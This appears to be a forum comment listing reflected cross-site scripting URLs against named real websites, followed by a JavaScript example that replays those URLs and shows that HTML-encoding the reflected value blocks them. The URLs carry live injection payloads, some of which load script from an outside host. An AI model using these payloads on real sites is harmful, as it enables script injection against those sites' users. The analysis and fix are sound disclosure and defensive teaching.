hrm, in the shop subdomain: https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit

news sites don't seem to budget much in the way of web application auditing, which is sad - they have a lot to lose from humiliating XSS exploits.. and good job with yahoo by the way, search engines are often a pain .. google in particular

PCI Compliance by 'authorized' security consultants is just another money-milking scam on the merchants =.= .. hopefully these guys don't charge much, as they probably don't do much: https://www.securitymetrics.com/eval_scan.adp?action=next&mc=1&email=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22&webserver=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22

And for the Acunetix troupe who check their website 'on a daily basis to ensure no such vulnerabilities exist' .. http://support.acunetix.com/index.php?form_submit=forgot_email&mod_id=6&forgot_email=XSS+is+here.%5C%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E
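The three URLs above are all the same bug: a "forgotten password" (or scan-request) parameter echoed straight back into an HTML attribute. The script below is an added example, not code from the commenter or from any of the sites named; it decodes each captured URL's reflected parameter and renders it through a stand-in form (the markup is assumed, since the real pages' HTML is not quoted) once without encoding and once with HTML encoding, then uses a small attribute-aware tokenizer to decide whether the value broke out of its `value="..."` context. The `CAPTURED_URLS` list, the template, and the function names are this example's own.

```javascript
'use strict';

// Added example: the URLs quoted in the thread, with the parameter each one reflects.
const CAPTURED_URLS = [
  { site: 'shop.starwars.com', param: 'email',
    url: 'https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit' },
  { site: 'securitymetrics.com', param: 'email',
    url: 'https://www.securitymetrics.com/eval_scan.adp?action=next&mc=1&email=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22&webserver=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22' },
  { site: 'support.acunetix.com', param: 'forgot_email',
    url: 'http://support.acunetix.com/index.php?form_submit=forgot_email&mod_id=6&forgot_email=XSS+is+here.%5C%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E' },
];

// Pull the reflected value out of the query string (percent-decoding, '+' -> space).
function reflectedParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Vulnerable stand-in (assumed markup): the submitted value is echoed back into a
// quoted attribute with no encoding, which is what each of the three pages did.
function renderVulnerable(email) {
  return '<form method="post">' +
    `<input type="text" name="email" value="${email}">` +
    '<input type="submit" name="LoginBtn" value="Submit"></form>';
}

// Hardened stand-in: same template, but the value is HTML-encoded first, so
// '"' can no longer close the attribute and '<' can no longer open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(email) {
  return renderVulnerable(escapeHtml(email));
}

// Minimal tag/attribute tokenizer. Quoted attribute values are consumed as a unit,
// so a '>' or '<' inside a properly quoted value does not start a new tag, exactly
// as a browser treats it. (HTML has no backslash escaping, so the '\"' in the
// Acunetix payload is inert: the '"' still closes the attribute.)
function tokenizeTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') { i++; continue; }
    let j = i + 1;
    const nameMatch = /^\/?[a-zA-Z][a-zA-Z0-9]*/.exec(html.slice(j));
    if (!nameMatch) { i++; continue; }
    const tag = { name: nameMatch[0].toLowerCase(), attrs: [] };
    j += nameMatch[0].length;
    while (j < html.length && html[j] !== '>') {
      if (/\s/.test(html[j])) { j++; continue; }
      const attrMatch = /^[^\s=>]+/.exec(html.slice(j));
      if (!attrMatch) { j++; continue; }
      const attrName = attrMatch[0].toLowerCase();
      j += attrName.length;
      let value = null;
      while (j < html.length && /\s/.test(html[j])) j++;
      if (html[j] === '=') {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, j + 1);
          value = html.slice(j + 1, end === -1 ? html.length : end);
          j = end === -1 ? html.length : end + 1;
        } else {
          value = /^[^\s>]*/.exec(html.slice(j))[0];
          j += value.length;
        }
      }
      tag.attrs.push([attrName, value]);
    }
    tags.push(tag);
    i = j + 1;
  }
  return tags;
}

// The tag sequence the stand-in template legitimately produces.
const TEMPLATE_TAGS = ['form', 'input', 'input', '/form'];

// Did the reflected value escape its attribute? True if a tag appears that the
// template never emits (the <script> payloads), or if an event-handler or style
// attribute was smuggled in (the onmouseover / -moz-binding payload; -moz-binding
// was a Firefox-only XBL vector, which is why that URL targets it).
function reflectionEscapesAttribute(html) {
  const tags = tokenizeTags(html);
  const names = tags.map((t) => t.name);
  const extraTag = names.length !== TEMPLATE_TAGS.length ||
    names.some((n, k) => n !== TEMPLATE_TAGS[k]);
  const injectedAttr = tags.some((t) =>
    t.attrs.some(([n]) => n.startsWith('on') || n === 'style'));
  return extraTag || injectedAttr;
}

// Replay every captured URL through both renderers.
function auditCapturedUrls() {
  return CAPTURED_URLS.map(({ site, param, url }) => {
    const value = reflectedParam(url, param);
    return {
      site,
      vulnerable: reflectionEscapesAttribute(renderVulnerable(value)),
      hardened: reflectionEscapesAttribute(renderHardened(value)),
    };
  });
}

for (const r of auditCapturedUrls()) console.log(r);
```

Run it with `node` and each site reports `vulnerable: true, hardened: false`. The tokenizer is deliberately context-aware rather than a substring match: a naive check like `/onmouseover=/` would still fire on the hardened output, because the text `onmouseover=` is still present, just harmlessly inside the quoted value. Encoding for the exact output context (here, a double-quoted attribute) is the fix; the check has to understand that context to confirm it.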